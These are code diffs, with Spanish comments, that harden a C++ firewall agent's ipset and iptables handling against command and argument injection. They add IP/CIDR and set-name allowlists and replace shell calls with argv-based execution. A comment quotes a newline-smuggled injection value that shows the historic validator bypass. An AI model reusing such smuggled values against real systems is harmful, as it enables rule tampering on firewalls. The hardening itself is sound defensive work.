+    static AutonomyConfig parse_autonomy(const Json::Value& json,
+                                         const std::string& config_path);
     // Load configuration from JSON file
     static FirewallAgentConfig load_from_file(const std::string& config_path,
                                                 const std::string& allowed_prefix = "/etc/ml-defender/");
@@ -240,8 +243,7 @@ private:
 
     static CsvBatchLoggerConfig parse_csv_batch_logger(const Json::Value& json);
 
-    static AutonomyConfig parse_autonomy(const Json::Value& json,
-                                         const std::string& config_path);
+
 };
 
 } // namespace mldefender::firewall

--- a/firewall-acl-agent/include/firewall/ip_cidr_validator.hpp
+++ b/firewall-acl-agent/include/firewall/ip_cidr_validator.hpp
@@ -1,0 +1,48 @@
+// ip_cidr_validator.hpp
+// H-2 / DEBT-AUTONOMY-REACTOR-CWE78-001: validación única de IP/CIDR, compartida
+// por ipset_wrapper (frontera ipset restore) y config_loader (frontera de carga:
+// autonomy.whitelist_cidrs → system("iptables ... -s <cidr>")). Una allowlist,
+// dos fronteras — mismo patrón que set_name_validator.hpp (evita divergencia DRY).
+#pragma once
+#include <string>
+#include <cctype>
+#include <arpa/inet.h>
+#include <sys/socket.h>
+
+namespace mldefender::firewall {
+
+    /// SEGURIDAD: allowlist estricto [0-9a-fA-F.:/] ANTES de descomponer — excluye
+    /// \n \r \t espacio ; $ ` | & ( ) y todo metacarácter de shell (cierra CWE-78
+    /// al interpolar en system()/restore).
+    /// ESTRUCTURAL (no de seguridad): dirección válida vía inet_pton + prefijo CIDR
+    /// numérico en rango [0, 32|128].
+    inline bool is_valid_ip_cidr(const std::string& ip) {
+        if (ip.empty() || ip.size() > 64) return false;
+        for (unsigned char c : ip)
+            if (!(std::isxdigit(c) || c == '.' || c == ':' || c == '/')) return false;
+
+        const auto slash = ip.find('/');
+        if (slash != std::string::npos &&
+            ip.find('/', slash + 1) != std::string::npos) return false;
+        const std::string ip_part = (slash == std::string::npos) ? ip : ip.substr(0, slash);
+
+        struct sockaddr_in  sa4;
+        struct sockaddr_in6 sa6;
+        const bool is_v4 = inet_pton(AF_INET,  ip_part.c_str(), &sa4.sin_addr)  == 1;
+        const bool is_v6 = inet_pton(AF_INET6, ip_part.c_str(), &sa6.sin6_addr) == 1;
+        if (!is_v4 && !is_v6) return false;
+
+        if (slash != std::string::npos) {
+            const std::string prefix = ip.substr(slash + 1);
+            if (prefix.empty() || prefix.size() > 3) return false;
+            int bits = 0;
+            for (unsigned char c : prefix) {
+                if (!std::isdigit(c)) return false;
+                bits = bits * 10 + (c - '0');
+            }
+            if (bits > (is_v6 ? 128 : 32)) return false;
+        }
+        return true;
+    }
+
+}  // namespace mldefender::firewall

--- a/firewall-acl-agent/include/firewall/ipset_wrapper.hpp
+++ b/firewall-acl-agent/include/firewall/ipset_wrapper.hpp
@@ -98,6 +98,7 @@ enum class IPSetErrorCode {
     PERMISSION_DENIED,
     BATCH_PARTIAL_FAILURE,
     SESSION_ERROR,
+    INVALID_SET_NAME,
 };
 
 struct IPSetError {

--- a/firewall-acl-agent/include/firewall/ipset_wrapper.hpp
+++ b/firewall-acl-agent/include/firewall/ipset_wrapper.hpp
@@ -180,6 +180,8 @@ struct IPSetStats {
 
 class IPSetWrapper {
 public:
+    // [H-2 DAY188 is_valid_ip -> public]
+    bool is_valid_ip(const std::string& ip) const;  // H-2: validador publico
     /// Constructor - initializes libipset session
     IPSetWrapper();
 
@@ -405,7 +407,6 @@ private:
     bool set_exists_unlocked(const std::string& set_name) const;
 
     /// Validate IP address format
-    bool is_valid_ip(const std::string& ip) const;
 
     /// Convert IPSetType to string
     static const char* type_to_string(IPSetType type);

--- a/firewall-acl-agent/include/firewall/set_name_validator.hpp
+++ b/firewall-acl-agent/include/firewall/set_name_validator.hpp
@@ -1,0 +1,31 @@
+// set_name_validator.hpp
+// H-2: validación única de nombres de ipset set, compartida por config_loader
+// (frontera de carga) e ipset_wrapper (frontera de ejecución). Una allowlist,
+// dos fronteras — evita divergencia DRY.
+#pragma once
+#include <string>
+#include <linux/netfilter/ipset/ip_set.h>  // IPSET_MAXNAMELEN
+
+namespace mldefender::firewall {
+
+    /// Devuelve true si `name` es un nombre de ipset set seguro y válido.
+    /// Allowlist: [A-Za-z0-9_-], longitud 1..IPSET_MAXNAMELEN-1 (31), y
+    /// RECHAZA '-' inicial (CWE-88 argument injection: "-X" se interpretaría
+    /// como flag de ipset). El allowlist ya excluye control chars como '\n'
+    /// por construcción (un newline no es alnum/'_'/'-').
+    inline bool is_valid_set_name(const std::string& name) {
+        if (name.empty() || name.size() >= IPSET_MAXNAMELEN) {
+            return false;
+        }
+        if (name.front() == '-') {  // CWE-88: argument injection
+            return false;
+        }
+        for (unsigned char c : name) {
+            if (!(std::isalnum(c) || c == '_' || c == '-')) {
+                return false;
+            }
+        }
+        return true;
+    }
+
+}  // namespace mldefender::firewall

--- a/firewall-acl-agent/src/core/autonomy_reactor.cpp
+++ b/firewall-acl-agent/src/core/autonomy_reactor.cpp
@@ -7,9 +7,16 @@
 
 namespace mldefender::firewall {
 
-static int default_executor(const std::string& cmd) {
-    return std::system(cmd.c_str());
-}
+    static int default_executor(const std::string& cmd) {
+        // INTERINO (DAY190) — CWE-78 MITIGADA en la frontera de config, NO aquí:
+        // el único fragmento de `cmd` derivado de input es <cidr>, validado por
+        // is_valid_ip_cidr() en ConfigLoader::parse_autonomy (fail-fast throw) antes
+        // de construir FirewallAutonomyReactor. CHAIN_NAME/COMMENT_* son constexpr.
+        // Prueba: tests ParseAutonomyCidrInjection.{Semicolon,Newline,CommandSub} (verdes).
+        // Silencia al analizador, NO al riesgo: el std::system sigue presente.
+        // Eliminación definitiva (execv sin shell) = DEBT-AUTONOMY-REACTOR-SAFEEXEC-002, POST-FEDER.
+        return std::system(cmd.c_str()); // nosemgrep: argus-shell-from-constructed-string
+    }
 
 FirewallAutonomyReactor::FirewallAutonomyReactor(
             std::vector<std::string> whitelist_cidrs,

--- a/firewall-acl-agent/src/core/config_loader.cpp
+++ b/firewall-acl-agent/src/core/config_loader.cpp
@@ -4,6 +4,7 @@
 //===----------------------------------------------------------------------===//
 
 #include "firewall/config_loader.hpp"
+#include "firewall/set_name_validator.hpp"
 #include <algorithm>
 #include <cctype>
 #include <fstream>
@@ -358,16 +359,9 @@ void ConfigLoader::validate_config(const FirewallAgentConfig& config) {
     // ([A-Za-z0-9_-], <=31 chars). Cierra inyeccion de comandos via config.
     if (config.ipset.set_name.empty()) {
         errors.push_back("IPSet name cannot be empty");
-    } else {
-        const auto& n = config.ipset.set_name;
-        const bool ok = n.size() <= 31 &&
-            std::all_of(n.begin(), n.end(), [](unsigned char c) {
-                return std::isalnum(c) || c == '_' || c == '-';
-            });
-        if (!ok) {
-            errors.push_back("IPSet name must match [A-Za-z0-9_-]{1,31} "
-                             "(got: '" + n + "')");
-        }
+    } else if (!is_valid_set_name(config.ipset.set_name)) {
+        errors.push_back("IPSet name must match [A-Za-z0-9_-]{1,31}, "
+                         "no leading '-' (got: '" + config.ipset.set_name + "')");
     }
 
     // Validate chain name

--- a/firewall-acl-agent/src/core/config_loader.cpp
+++ b/firewall-acl-agent/src/core/config_loader.cpp
@@ -5,6 +5,7 @@
 
 #include "firewall/config_loader.hpp"
 #include "firewall/set_name_validator.hpp"
+#include "firewall/ip_cidr_validator.hpp"
 #include <algorithm>
 #include <cctype>
 #include <fstream>
@@ -514,6 +515,21 @@ CsvBatchLoggerConfig ConfigLoader::parse_csv_batch_logger(const Json::Value& jso
             "   Fix: Especificar al menos un CIDR permitido durante modo autónomo.\n"
             "   Un array vacío bloquearía toda la LAN clínica."
         );
+    }
+
+    // H-2 DAY190 — DEBT-AUTONOMY-REACTOR-CWE78-001 (CWE-78): cada CIDR se interpola
+    // en system("iptables ... -s <cidr>") (autonomy_reactor.cpp) bajo root. Allowlist
+    // estricto ANTES de aceptar = cierra inyección de comandos vía config. Fail-fast:
+    // un solo CIDR inválido aborta la carga (JSON is LAW — config mala no arranca).
+    for (const auto& cidr : config.whitelist_cidrs) {
+        if (!is_valid_ip_cidr(cidr)) {
+            throw std::runtime_error(
+                "❌ INVALID CIDR en 'autonomy.whitelist_cidrs': '" + cidr + "' ("
+                + config_path + ")\n"
+                "   Debe ser IPv4/IPv6 o CIDR válido ([0-9a-fA-F.:/], prefijo en rango).\n"
+                "   Rechazado por allowlist — ver DEBT-AUTONOMY-REACTOR-CWE78-001 (CWE-78)."
+            );
+        }
     }
 
     config.reconcile_interval_sec = get_optional<int>(json, "reconcile_interval_sec", 90);

--- a/firewall-acl-agent/src/core/ipset_wrapper.cpp
+++ b/firewall-acl-agent/src/core/ipset_wrapper.cpp
@@ -15,6 +15,7 @@
 
 #include "firewall/ipset_wrapper.hpp"
 #include "firewall/set_name_validator.hpp"
+#include "firewall/ip_cidr_validator.hpp"
 #include "safe_exec.hpp"
 #include <cstring>
 #include <cctype>
@@ -72,62 +73,11 @@ const char* IPSetWrapper::family_to_string(IPSetFamily family) {
     return "inet";
 }
 
-bool IPSetWrapper::is_valid_ip(const std::string& ip) const {
-    // [H-2 DAY188 is_valid_ip hardened] — NO BORRAR este marcador (idempotencia del parche).
-    // La entrada cruda alimenta un fichero 'ipset restore' (mini-lenguaje por lineas):
-    // un '\n' inyecta una linea add/del nueva. El bypass historico validaba SOLO el trozo
-    // pre-'/' y aprobaba el todo (p.ej. "1.2.3.4/24\nadd evil 6.6.6.6"). Defensa: allowlist
-    // estricto de caracteres ANTES de descomponer + prefijo CIDR numerico y en rango.
-    if (ip.empty() || ip.size() > 64) {  // IPv6 textual ~45; /128 ~49; 64 holgado
-        return false;
-    }
-
-    // Allowlist: solo el alfabeto de una IP/CIDR. Excluye \n \r \t espacio ; $ ` | & ( ) etc.
-    for (unsigned char c : ip) {
-        const bool ok = std::isxdigit(c) || c == '.' || c == ':' || c == '/';
-        if (!ok) {
-            return false;
-        }
-    }
-
-    // A lo sumo un '/'.
-    const auto slash = ip.find('/');
-    if (slash != std::string::npos &&
-        ip.find('/', slash + 1) != std::string::npos) {
-        return false;
-    }
-    const std::string ip_part = (slash == std::string::npos) ? ip : ip.substr(0, slash);
-
-    // La direccion debe ser IPv4 o IPv6 textual valida.
-    struct sockaddr_in  sa4;
-    struct sockaddr_in6 sa6;
-    const bool is_v4 = inet_pton(AF_INET,  ip_part.c_str(), &sa4.sin_addr)  == 1;
-    const bool is_v6 = inet_pton(AF_INET6, ip_part.c_str(), &sa6.sin6_addr) == 1;
-    if (!is_v4 && !is_v6) {
-        return false;
-    }
-
-    // Prefijo CIDR: 1-3 digitos numericos, en rango [0, 32|128]. Sin excepciones.
-    if (slash != std::string::npos) {
-        const std::string prefix = ip.substr(slash + 1);
-        if (prefix.empty() || prefix.size() > 3) {
-            return false;
-        }
-        int bits = 0;
-        for (unsigned char c : prefix) {
-            if (!std::isdigit(c)) {
-                return false;
-            }
-            bits = bits * 10 + (c - '0');
-        }
-        const int max_bits = is_v6 ? 128 : 32;
-        if (bits > max_bits) {
-            return false;
-        }
-    }
-
-    return true;
-}
+// [H-2 DAY188 is_valid_ip hardened] — lógica MOVIDA a firewall/ip_cidr_validator.hpp
+// (DAY190, DEBT-AUTONOMY-REACTOR-CWE78-001). Este método es ahora un alias de
+// compatibilidad de la API pública; la implementación y su modelo de amenaza viven
+// en el header compartido. NO BORRAR este marcador (idempotencia del parche).
+bool IPSetWrapper::is_valid_ip(const std::string& ip) const { return is_valid_ip_cidr(ip); }
 
 //===----------------------------------------------------------------------===//
 // System Command Execution

--- a/firewall-acl-agent/src/core/ipset_wrapper.cpp
+++ b/firewall-acl-agent/src/core/ipset_wrapper.cpp
@@ -16,6 +16,7 @@
 #include "firewall/ipset_wrapper.hpp"
 
 #include <cstring>
+#include <cctype>
 #include <sstream>
 #include <fstream>
 #include <regex>
@@ -68,25 +69,60 @@ const char* IPSetWrapper::family_to_string(IPSetFamily family) {
 }
 
 bool IPSetWrapper::is_valid_ip(const std::string& ip) const {
-    // Check for CIDR notation
-    std::string ip_part = ip;
-    if (auto pos = ip.find('/'); pos != std::string::npos) {
-        ip_part = ip.substr(0, pos);
+    // [H-2 DAY188 is_valid_ip hardened] — NO BORRAR este marcador (idempotencia del parche).
+    // La entrada cruda alimenta un fichero 'ipset restore' (mini-lenguaje por lineas):
+    // un '\n' inyecta una linea add/del nueva. El bypass historico validaba SOLO el trozo
+    // pre-'/' y aprobaba el todo (p.ej. "1.2.3.4/24\nadd evil 6.6.6.6"). Defensa: allowlist
+    // estricto de caracteres ANTES de descomponer + prefijo CIDR numerico y en rango.
+    if (ip.empty() || ip.size() > 64) {  // IPv6 textual ~45; /128 ~49; 64 holgado
+        return false;
     }
 
-    // Try IPv4
-    struct sockaddr_in sa4;
-    if (inet_pton(AF_INET, ip_part.c_str(), &(sa4.sin_addr)) == 1) {
-        return true;
+    // Allowlist: solo el alfabeto de una IP/CIDR. Excluye \n \r \t espacio ; $ ` | & ( ) etc.
+    for (unsigned char c : ip) {
+        const bool ok = std::isxdigit(c) || c == '.' || c == ':' || c == '/';
+        if (!ok) {
+            return false;
+        }
     }
 
-    // Try IPv6
+    // A lo sumo un '/'.
+    const auto slash = ip.find('/');
+    if (slash != std::string::npos &&
+        ip.find('/', slash + 1) != std::string::npos) {
+        return false;
+    }
+    const std::string ip_part = (slash == std::string::npos) ? ip : ip.substr(0, slash);
+
+    // La direccion debe ser IPv4 o IPv6 textual valida.
+    struct sockaddr_in  sa4;
     struct sockaddr_in6 sa6;
-    if (inet_pton(AF_INET6, ip_part.c_str(), &(sa6.sin6_addr)) == 1) {
-        return true;
+    const bool is_v4 = inet_pton(AF_INET,  ip_part.c_str(), &sa4.sin_addr)  == 1;
+    const bool is_v6 = inet_pton(AF_INET6, ip_part.c_str(), &sa6.sin6_addr) == 1;
+    if (!is_v4 && !is_v6) {
+        return false;
     }
 
-    return false;
+    // Prefijo CIDR: 1-3 digitos numericos, en rango [0, 32|128]. Sin excepciones.
+    if (slash != std::string::npos) {
+        const std::string prefix = ip.substr(slash + 1);
+        if (prefix.empty() || prefix.size() > 3) {
+            return false;
+        }
+        int bits = 0;
+        for (unsigned char c : prefix) {
+            if (!std::isdigit(c)) {
+                return false;
+            }
+            bits = bits * 10 + (c - '0');
+        }
+        const int max_bits = is_v6 ? 128 : 32;
+        if (bits > max_bits) {
+            return false;
+        }
+    }
+
+    return true;
 }
 
 //===----------------------------------------------------------------------===//

--- a/firewall-acl-agent/src/core/ipset_wrapper.cpp
+++ b/firewall-acl-agent/src/core/ipset_wrapper.cpp
@@ -14,7 +14,8 @@
 //===----------------------------------------------------------------------===//
 
 #include "firewall/ipset_wrapper.hpp"
-
+#include "firewall/set_name_validator.hpp"
+#include "safe_exec.hpp"
 #include <cstring>
 #include <cctype>
 #include <sstream>
@@ -50,6 +51,9 @@ IPSetWrapper::~IPSetWrapper() = default;
 //===----------------------------------------------------------------------===//
 // Helper Functions
 //===----------------------------------------------------------------------===//
+
+// H-2 DAY189: ipset vive en /sbin (no en PATH de usuario). execv NO usa PATH → ruta absoluta.
+static constexpr const char* kIpsetBin = "/sbin/ipset";
 
 const char* IPSetWrapper::type_to_string(IPSetType type) {
     switch (type) {
@@ -129,21 +133,7 @@ bool IPSetWrapper::is_valid_ip(const std::string& ip) const {
 // System Command Execution
 //===----------------------------------------------------------------------===//
 
-static std::pair<int, std::string> execute_command(const std::string& cmd) {
-    FILE* pipe = popen(cmd.c_str(), "r");
-    if (!pipe) {
-        return {-1, "Failed to execute command"};
-    }
-
-    char buffer[512];
-    std::string result;
-    while (fgets(buffer, sizeof(buffer), pipe)) {
-        result += buffer;
-    }
-
-    int ret = pclose(pipe);
-    return {ret, result};
-}
+// execute_command ELIMINADA (H-2 DAY189): toda ejecución pasa por safe_exec* (sin shell).
 
 //===----------------------------------------------------------------------===//
 // Set Management
@@ -160,49 +150,59 @@ IPSetResult<void> IPSetWrapper::create_set(const IPSetConfig& config) {
         });
     }
 
-    // Build ipset create command
-    std::ostringstream cmd;
-    cmd << "ipset create " << config.name << " " << type_to_string(config.type)
-        << " family " << family_to_string(config.family)
-        << " hashsize " << config.hashsize
-        << " maxelem " << config.maxelem;
-
-    if (config.timeout > 0) {
-        cmd << " timeout " << config.timeout;
-    }
-
-    if (config.counters) {
-        cmd << " counters";
-    }
-
-    if (config.comment) {
-        cmd << " comment";
-    }
-
-    if (config.type == IPSetType::HASH_NET) {
-        cmd << " netmask " << config.netmask;
-    }
-
-    cmd << " 2>&1";
-
-    if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd.str() << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
-    }
-    auto [ret, output] = execute_command(cmd.str());
-
-    if (ret != 0) {
+    // H-2 DAY189: validar nombre antes de construir argv (sin shell).
+    if (!is_valid_set_name(config.name)) {
         return IPSetResult<void>(IPSetError{
-            IPSetErrorCode::KERNEL_ERROR,
-            "Failed to create set: " + output
+            IPSetErrorCode::INVALID_SET_NAME,
+            "Invalid set name: '" + config.name + "'"
         });
     }
 
+    // Build ipset create argv (token a token, NUNCA concatenado en shell).
+    std::vector<std::string> args = {
+        kIpsetBin, "create", config.name, type_to_string(config.type),
+        "family", family_to_string(config.family),
+        "hashsize", std::to_string(config.hashsize),
+        "maxelem", std::to_string(config.maxelem)
+    };
+    if (config.timeout > 0) {
+        args.push_back("timeout");
+        args.push_back(std::to_string(config.timeout));
+    }
+    if (config.counters) {
+        args.push_back("counters");
+    }
+    if (config.comment) {
+        args.push_back("comment");
+    }
+    if (config.type == IPSetType::HASH_NET) {
+        args.push_back("netmask");
+        args.push_back(std::to_string(config.netmask));
+    }
+
+    if (m_dry_run) {
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " create "
+                  << config.name << std::endl;
+        return IPSetResult<void>(); // Success in dry-run
+    }
+    int ret = safe_exec(args);
+    if (ret != 0) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::KERNEL_ERROR, "Failed to create set"
+        });
+    }
     return IPSetResult<void>();
 }
 
 IPSetResult<void> IPSetWrapper::destroy_set(const std::string& set_name) {
     std::lock_guard<std::mutex> lock(mutex_);
+
+    if (!is_valid_set_name(set_name)) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::INVALID_SET_NAME,
+            "Invalid set name: '" + set_name + "'"
+        });
+    }
 
     if (!set_exists_unlocked(set_name)) {
         return IPSetResult<void>(IPSetError{
@@ -211,28 +211,28 @@ IPSetResult<void> IPSetWrapper::destroy_set(const std::string& set_name) {
         });
     }
 
-    std::string cmd = "ipset destroy " + set_name + " 2>&1";
     if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " destroy "
+                  << set_name << std::endl;
         return IPSetResult<void>(); // Success in dry-run
     }
-    auto [ret, output] = execute_command(cmd);
-
+    int ret = safe_exec({kIpsetBin, "destroy", set_name});
     if (ret != 0) {
         return IPSetResult<void>(IPSetError{
-            IPSetErrorCode::KERNEL_ERROR,
-            "Failed to destroy set: " + output
+            IPSetErrorCode::KERNEL_ERROR, "Failed to destroy set"
         });
     }
-
     return IPSetResult<void>();
 }
 
 bool IPSetWrapper::set_exists_unlocked(const std::string& set_name) const {
     // Internal version - assumes caller already holds mutex_
     // NO lock here
-    std::string cmd = "ipset list " + set_name + " -n > /dev/null 2>&1";
-    int ret = system(cmd.c_str());
+    // H-2 DAY189: nombre inválido → el set no puede existir. Sin shell.
+    if (!is_valid_set_name(set_name)) {
+        return false;
+    }
+    int ret = safe_exec({kIpsetBin, "list", set_name, "-n"});
     return (ret == 0);
 }
 
@@ -246,30 +246,32 @@ std::vector<std::string> IPSetWrapper::list_sets() const {
 
     std::vector<std::string> sets;
 
-    FILE* pipe = popen("ipset list -n 2>/dev/null", "r");
-    if (!pipe) {
+    auto [ret, output] = safe_exec_with_output({kIpsetBin, "list", "-n"});
+    if (ret != 0) {
         return sets;
     }
 
-    char buffer[256];
-    while (fgets(buffer, sizeof(buffer), pipe)) {
-        std::string line(buffer);
-        // Remove trailing newline
-        if (!line.empty() && line.back() == '\n') {
-            line.pop_back();
-        }
+    std::istringstream iss(output);
+    std::string line;
+    while (std::getline(iss, line)) {
+        if (!line.empty() && line.back() == '\r') line.pop_back();
         if (!line.empty()) {
             sets.push_back(line);
         }
     }
-
-    pclose(pipe);
 
     return sets;
 }
 
 IPSetResult<void> IPSetWrapper::flush_set(const std::string& set_name) {
     std::lock_guard<std::mutex> lock(mutex_);
+
+    if (!is_valid_set_name(set_name)) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::INVALID_SET_NAME,
+            "Invalid set name: '" + set_name + "'"
+        });
+    }
 
     if (!set_exists_unlocked(set_name)) {
         return IPSetResult<void>(IPSetError{
@@ -278,20 +280,17 @@ IPSetResult<void> IPSetWrapper::flush_set(const std::string& set_name) {
         });
     }
 
-    std::string cmd = "ipset flush " + set_name + " 2>&1";
     if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " flush "
+                  << set_name << std::endl;
         return IPSetResult<void>(); // Success in dry-run
     }
-    auto [ret, output] = execute_command(cmd);
-
+    int ret = safe_exec({kIpsetBin, "flush", set_name});
     if (ret != 0) {
         return IPSetResult<void>(IPSetError{
-            IPSetErrorCode::KERNEL_ERROR,
-            "Failed to flush set: " + output
+            IPSetErrorCode::KERNEL_ERROR, "Failed to flush set"
         });
     }
-
     return IPSetResult<void>();
 }
 
@@ -307,6 +306,13 @@ IPSetResult<void> IPSetWrapper::add_batch(
 
     if (entries.empty()) {
         return IPSetResult<void>();
+    }
+
+	if (!is_valid_set_name(set_name)) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::INVALID_SET_NAME,  // ¿hay un código mejor? ver nota
+            "Invalid set name (rejected by allowlist): '" + set_name + "'"
+        });
     }
 
     if (!set_exists_unlocked(set_name)) {
@@ -367,22 +373,19 @@ IPSetResult<void> IPSetWrapper::add_batch(
     outfile.close();
 
     // Execute ipset restore (SINGLE SYSCALL for entire batch)
-    std::string cmd = "ipset restore < " + std::string(tmpfile) + " 2>&1";
     if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin
+                  << " restore < " << tmpfile << std::endl;
+        return IPSetResult<void>();
     }
-    auto [ret, output] = execute_command(cmd);
-
+    int ret = safe_exec_with_file_in({kIpsetBin, "restore"}, tmpfile);
     std::remove(tmpfile);
-
-    if (ret != 0 && !output.empty()) {
+    if (ret != 0) {
         return IPSetResult<void>(IPSetError{
             IPSetErrorCode::KERNEL_ERROR,
-            "Batch add failed: " + output
+            "Batch add failed (ipset restore exit=" + std::to_string(ret) + ")"
         });
     }
-
     return IPSetResult<void>();
 }
 
@@ -394,6 +397,13 @@ IPSetResult<void> IPSetWrapper::delete_batch(
 
     if (ips.empty()) {
         return IPSetResult<void>();
+    }
+
+	if (!is_valid_set_name(set_name)) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::INVALID_SET_NAME,  // ¿hay un código mejor? ver nota
+            "Invalid set name (rejected by allowlist): '" + set_name + "'"
+        });
     }
 
     if (!set_exists_unlocked(set_name)) {
@@ -435,22 +445,19 @@ IPSetResult<void> IPSetWrapper::delete_batch(
     outfile << restore_input.str();
     outfile.close();
 
-    std::string cmd = "ipset restore -exist < " + std::string(tmpfile) + " 2>&1";
     if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin
+                  << " restore -exist < " << tmpfile << std::endl;
+        return IPSetResult<void>();
     }
-    auto [ret, output] = execute_command(cmd);
-
+    int ret = safe_exec_with_file_in({kIpsetBin, "restore", "-exist"}, tmpfile);
     std::remove(tmpfile);
-
-    if (ret != 0 && !output.empty()) {
+    if (ret != 0) {
         return IPSetResult<void>(IPSetError{
             IPSetErrorCode::KERNEL_ERROR,
-            "Batch delete failed: " + output
+            "Batch delete failed (ipset restore exit=" + std::to_string(ret) + ")"
         });
     }
-
     return IPSetResult<void>();
 }
 
@@ -478,13 +485,13 @@ bool IPSetWrapper::test(
 ) const {
     std::lock_guard<std::mutex> lock(mutex_);
 
+    if (!is_valid_set_name(set_name)) {
+        return false;
+    }
     if (!is_valid_ip(ip)) {
         return false;
     }
-
-    std::string cmd = "ipset test " + set_name + " " + ip + " > /dev/null 2>&1";
-    int ret = system(cmd.c_str());
-
+    int ret = safe_exec({kIpsetBin, "test", set_name, ip});
     return (ret == 0);
 }
 
@@ -516,14 +523,12 @@ IPSetResult<IPSetStats> IPSetWrapper::get_stats(
     IPSetStats stats;
     stats.name = set_name;
 
-    // Get stats via ipset list
-    std::string cmd = "ipset list " + set_name + " 2>&1";
-    auto [ret, output] = execute_command(cmd);
+    // Get stats via ipset list (sin shell). set_name ya validado por set_exists_unlocked arriba.
+    auto [ret, output] = safe_exec_with_output({kIpsetBin, "list", set_name});
 
     if (ret != 0) {
         return IPSetResult<IPSetStats>(IPSetError{
-            IPSetErrorCode::KERNEL_ERROR,
-            "Failed to get stats: " + output
+            IPSetErrorCode::KERNEL_ERROR, "Failed to get stats"
         });
     }
 
@@ -561,25 +566,30 @@ std::vector<std::string> IPSetWrapper::list_entries(
 
     std::vector<std::string> entries;
 
-    std::string cmd = "ipset save " + set_name + " 2>/dev/null | grep '^add'";
-    FILE* pipe = popen(cmd.c_str(), "r");
-    if (!pipe) {
+    // H-2 DAY189: validar nombre antes de pasarlo a ipset (sin shell, grep → C++).
+    if (!is_valid_set_name(set_name)) {
         return entries;
     }
 
-    char buffer[512];
-    while (fgets(buffer, sizeof(buffer), pipe)) {
-        std::string line(buffer);
-        // Parse: "add setname ip [options]"
-        std::istringstream iss(line);
+    auto [ret, output] = safe_exec_with_output({kIpsetBin, "save", set_name});
+    if (ret != 0) {
+        return entries;
+    }
+
+    std::istringstream iss(output);
+    std::string line;
+    while (std::getline(iss, line)) {
+        // Filtro equivalente al antiguo '| grep ^add', ahora en C++.
+        if (line.rfind("add ", 0) != 0) {
+            continue;
+        }
+        std::istringstream line_ss(line);
         std::string cmd_word, setname, ip;
-        iss >> cmd_word >> setname >> ip;
+        line_ss >> cmd_word >> setname >> ip;
         if (!ip.empty()) {
             entries.push_back(ip);
         }
     }
-
-    pclose(pipe);
 
     return entries;
 }
@@ -594,20 +604,24 @@ IPSetResult<void> IPSetWrapper::rename_set(
 ) {
     std::lock_guard<std::mutex> lock(mutex_);
 
-    std::string cmd = "ipset rename " + old_name + " " + new_name + " 2>&1";
-    if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
-    }
-    auto [ret, output] = execute_command(cmd);
-
-    if (ret != 0) {
+    if (!is_valid_set_name(old_name) || !is_valid_set_name(new_name)) {
         return IPSetResult<void>(IPSetError{
-            IPSetErrorCode::KERNEL_ERROR,
-            "Failed to rename set: " + output
+            IPSetErrorCode::INVALID_SET_NAME,
+            "Invalid set name in rename"
         });
     }
 
+    if (m_dry_run) {
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " rename "
+                  << old_name << " " << new_name << std::endl;
+        return IPSetResult<void>(); // Success in dry-run
+    }
+    int ret = safe_exec({kIpsetBin, "rename", old_name, new_name});
+    if (ret != 0) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::KERNEL_ERROR, "Failed to rename set"
+        });
+    }
     return IPSetResult<void>();
 }
 
@@ -617,60 +631,70 @@ IPSetResult<void> IPSetWrapper::swap_sets(
 ) {
     std::lock_guard<std::mutex> lock(mutex_);
 
-    std::string cmd = "ipset swap " + set1 + " " + set2 + " 2>&1";
-    if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
-    }
-    auto [ret, output] = execute_command(cmd);
-
-    if (ret != 0) {
+    if (!is_valid_set_name(set1) || !is_valid_set_name(set2)) {
         return IPSetResult<void>(IPSetError{
-            IPSetErrorCode::KERNEL_ERROR,
-            "Failed to swap sets: " + output
+            IPSetErrorCode::INVALID_SET_NAME,
+            "Invalid set name in swap"
         });
     }
 
+    if (m_dry_run) {
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " swap "
+                  << set1 << " " << set2 << std::endl;
+        return IPSetResult<void>(); // Success in dry-run
+    }
+    int ret = safe_exec({kIpsetBin, "swap", set1, set2});
+    if (ret != 0) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::KERNEL_ERROR, "Failed to swap sets"
+        });
+    }
     return IPSetResult<void>();
 }
 
 IPSetResult<void> IPSetWrapper::save(const std::string& filepath) const {
     std::lock_guard<std::mutex> lock(mutex_);
 
-    std::string cmd = "ipset save > " + filepath + " 2>&1";
-    if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
-    }
-    auto [ret, output] = execute_command(cmd);
-
-    if (ret != 0) {
+    if (!validate_filepath(filepath)) {
         return IPSetResult<void>(IPSetError{
             IPSetErrorCode::KERNEL_ERROR,
-            "Failed to save ipsets: " + output
+            "Invalid filepath for save"
         });
     }
-
+    if (m_dry_run) {
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " save > "
+                  << filepath << std::endl;
+        return IPSetResult<void>(); // Success in dry-run
+    }
+    int ret = safe_exec_with_file_out({kIpsetBin, "save"}, filepath);
+    if (ret != 0) {
+        return IPSetResult<void>(IPSetError{
